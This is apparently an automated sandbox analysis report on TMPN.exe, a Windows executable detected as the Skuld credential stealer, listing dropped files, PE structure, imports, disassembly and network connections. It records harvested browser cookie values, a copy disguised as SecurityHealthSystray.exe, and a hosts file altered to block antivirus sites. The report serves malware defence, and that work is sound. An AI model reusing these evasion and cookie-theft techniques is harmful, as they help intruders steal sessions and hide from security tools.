SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eanoxfxk.uxw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eladis2m.5u2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnr2abxa.o5v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_na1ce4p5.i42.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub2ipgmj.uj5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default\cookies.txt

Download File

Process:	C:\Users\user\Desktop\TMPN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.831330556952287
Encrypted:	false
SSDEEP:	6:Pk3r4QVLP36lSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISsc3rsB7iUuxbz:c74QVLP3ClDuyXv3RdJqmOvO60c72736
MD5:	021CBD2DCACB59433DD928535BCF95BE
SHA1:	2EEFDA675FAC0016B8EDC6B82825848761158CB2
SHA-256:	5C81F2EAF4AB183E201987FF4C6253F0C540898E9E7073BD0C7762143904BCE6
SHA-512:	B92FE996E9DA721B2F0DBF3F04469278A6EF479D9AF8ADB5F025C39AA73F283BD109F6910A9058FF2BA0BD744E704D90EB27DA59DE6C83B437F9CD2F8DA982D5
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13356771602392648.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg..google.com.TRUE./.FALSE.13343552440345167.1P_JAR.2023-10-05-06.

C:\Users\user\AppData\Local\Temp\browsers.zip

Download File

Process:	C:\Users\user\Desktop\TMPN.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	423
Entropy (8bit):	6.506600492184038
Encrypted:	false
SSDEEP:	12:5jieOkGvuUsPx+Qz/1sNg7u5mRKEO7y+319qxOkRae:9ieOpbvm1uIkSKEYp19qxOu
MD5:	280B743BA8C1D6DCB9E32ABCA0DC0D2F
SHA1:	7CED09CDDFE94C573D26E92702D368382A6EE9BD
SHA-256:	D6F37B67CD5FF0D2BA3CEE4AFC3AF90689C7748AAC85C28F30E3FF92AAE54497
SHA-512:	55D7F8524EB4F2E12E67D761D573E0B6442AB15E2EBD7AB4B13DFBBE3CAC218EEAA74BF6A73E664A3213A1CC5D24BFE21770522638AE9EB902BECD865DEF51B0
Malicious:	false
Preview:	PK........................#...user\Chrome\Default\cookies.txt\|.Kr.0...u....y......"21).1.."E.T....=.75.`..T.=.\...X..>..c..1...g$..z.(B.e...Y...'.[.Y.C...Y...+?..^...u...Z}...6..L...=.P.M.y..mM!...]..W....{t#w..2.o..R2......CW..v..F.......JH.Fk'.c.f......#.R....E,...71.>.........7....PK....p/........PK................p/........#.................user\Chrome\Default\cookies.txtPK..........Q...@.....

C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Download File

Process:	C:\Users\user\Desktop\TMPN.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14904320
Entropy (8bit):	7.021226128887653
Encrypted:	false
SSDEEP:	196608:oWJafoL/tUoTX4Z8bh1Yf0k7Ma/rkFlgdTaUrPPbdfw:oWsfm/Vbh1lkSFCdTauZo
MD5:	59A08BB8BF4881E814FD3D36F525DA8A
SHA1:	3F542BE6B20DAEF732A4C4BEE9BAD1DDE8B375F0
SHA-256:	03DA816F34074A5E1941ABABC4CBAB2880D149A03B1B3B1000CF065479D50272
SHA-512:	DFC2C2A0C743918642943D296C3B26367D80CE49D3C0EE099C27398ED134A965203014B1B0346E41D882531F8D0BDB878CC38EE1C2420844BD9CFD70677E002A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 71%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........R3...."......<J..>................@...........................................`... ..............................................P..T............................`..^....................................................&...............................text....:J......<J................. ..`.rdata..P.C..PJ...C..BJ.............@..@.data...`e... ...>..................@....pdata...............J..............@..@.xdata.......@......................@..@/4......)....P......................@..B/19.....I....`......................@..B/32.....B....P.....................@..B/46.....0..........................@..B/65.....?...........................@..B/78.................................@..B/90..........P......................@..B.idata..T....P......................@....reloc..^....`......................@..B.symtab......`.........................B........

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\Desktop\TMPN.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2165
Entropy (8bit):	4.522303506272206
Encrypted:	false
SSDEEP:	48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
MD5:	BD87D7EA7B5DBD74CC0B0E38477F6079
SHA1:	63C28862A5D0052F2425A8B45AC0F66572A02F33
SHA-256:	EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
SHA-512:	1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	392
Entropy (8bit):	5.237198052265355
Encrypted:	false
SSDEEP:	12:0k4+DgBWg/sK2vAPKZC92/4jJpBVd+min79eEno:0k4+tgsZS2kX+TxXo
MD5:	7F599F4277A8C4152074D773FD3AB801
SHA1:	D19F04FD5E944642D6C5D684EBAB2F42C1177197
SHA-256:	A3639AF5E23464FC391DAE127FD5493F02C8178068A35866D9C7FDD35DCD623F
SHA-512:	CCE2C7C5240EA0D59C9C01C3AB3E3D7B4E0B026D5385B330D5B60D45B01D4D9CF5662B22F445154EE7368DF09D0D6C863D7019D20CDDFBC6E7C533774B46707B
Malicious:	false
Preview:	#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	7.021226128887653
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TMPN.exe
File size:	14'904'320 bytes
MD5:	59a08bb8bf4881e814fd3d36f525da8a
SHA1:	3f542be6b20daef732a4c4bee9bad1dde8b375f0
SHA256:	03da816f34074a5e1941ababc4cbab2880d149a03b1b3b1000cf065479d50272
SHA512:	dfc2c2a0c743918642943d296c3b26367d80ce49d3c0ee099c27398ed134a965203014b1b0346e41d882531f8d0bdb878cc38ee1c2420844bd9cfd70677e002a
SSDEEP:	196608:oWJafoL/tUoTX4Z8bh1Yf0k7Ma/rkFlgdTaUrPPbdfw:oWsfm/Vbh1lkSFCdTauZo
TLSH:	39E69C43E97246A5C0E99276C6A686537E743C884F3163D36B60FB387F76BD0AA74700
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........R3...."......<J..>................@...........................................`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x46e000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	c2d457ad8ac36fc9f18d45bffcd450c2

Entrypoint Preview

Instruction
jmp 00007F41BCC8B2C0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [00970072h]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007F41BCC8EBE5h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007F41BCC8F47Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe15000	0x554	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x9e9000	0x1acf4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe16000	0xfe5e	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8e26e0	0x180	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4a3ab4	0x4a3c00	3e67fe5805e1cb649326767ccd8a86a9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4a5000	0x43c850	0x43ca00	e6992b3f0b63cc9a2572e0e450393280	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8e2000	0x106560	0x73e00	27e40bb155ea56ae0dcb020d08cacbd4	False	0.34103416599244873	data	4.837510355249362	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x9e9000	0x1acf4	0x1ae00	6234b3cff5cdcbda05c294002280d4e7	False	0.40109011627906976	data	5.506125963193086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0xa04000	0xb4	0x200	ff4301e8bfe86ac4646d25fff8e0e41a	False	0.2265625	shared library	1.787112262798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0xa05000	0x129	0x200	17f62672c8506464ae13eccc2eb6cb94	False	0.623046875	data	5.081946473254993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0xa06000	0xdeb49	0xdec00	04fdae12403a97fc2de2c3122692e7d0	False	1.0001085069444444	data	7.996237937060594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0xae5000	0x29742	0x29800	edb6907ce4c2ee3cc56c8bb4a4ff9f84	False	0.9969879518072289	data	7.938102957416676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0xb0f000	0x30	0x200	40cca7c46fc713b4f088e5d440ca7931	False	0.103515625	data	0.8556848540171443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0xb10000	0x1a913f	0x1a9200	e5f182362801b502a1effd8f6e0a5abe	False	0.9996628978609232	data	7.998716315424322	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78	0xcba000	0x10afb1	0x10b000	62889f0d70abaa9de1ed1a8deac9c631	False	0.9926648086376404	data	7.995925936459091	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0xdc5000	0x4f6ee	0x4f800	13798c428584a859b4d30c3534e40598	False	0.9730247641509434	data	7.8191080579130166	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0xe15000	0x554	0x600	a5f93a4500f918c669c8b023dc50c1a3	False	0.3802083333333333	data	4.011069182466819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xe16000	0xfe5e	0x10000	a8613587c75059534ffb9c67321c470a	False	0.22283935546875	data	5.44583402293171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xe26000	0xaa8bb	0xaaa00	27a3b128dced8ae3d98a876e3bcf9703	False	0.20735176282051282	data	5.348187441481699	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 3, 2024 04:18:00.746561050 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:00.746603966 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:00.746701956 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:00.748724937 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:00.748744965 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.187375069 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.187535048 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.187561035 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.187655926 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.187660933 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.188946962 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.189021111 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.284565926 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.284691095 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.284768105 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.332587004 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.332623005 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.374077082 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.387656927 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.387732983 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.387784004 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.417098999 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.417129040 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:01.417150974 CEST	49710	443	192.168.2.6	172.67.74.152
Sep 3, 2024 04:18:01.417156935 CEST	443	49710	172.67.74.152	192.168.2.6
Sep 3, 2024 04:18:02.544070959 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:02.549901009 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:18:02.549985886 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:02.550251961 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:02.555214882 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:18:03.039225101 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:18:03.081845999 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:04.880785942 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:04.880831957 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:04.880889893 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:04.881794930 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:04.881809950 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.319905043 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.320400000 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.320425034 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.320502996 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.320508003 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.321521044 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.321573019 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.334289074 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.334371090 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.334438086 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.334458113 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.334470034 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.376497984 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.382169962 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.490562916 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.490672112 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.490715027 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.491213083 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.491238117 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:05.491252899 CEST	49713	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:05.491259098 CEST	443	49713	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:10.869684935 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:10.874538898 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:18:10.974193096 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:18:11.081407070 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:27.182045937 CEST	49720	443	192.168.2.6	162.159.128.233
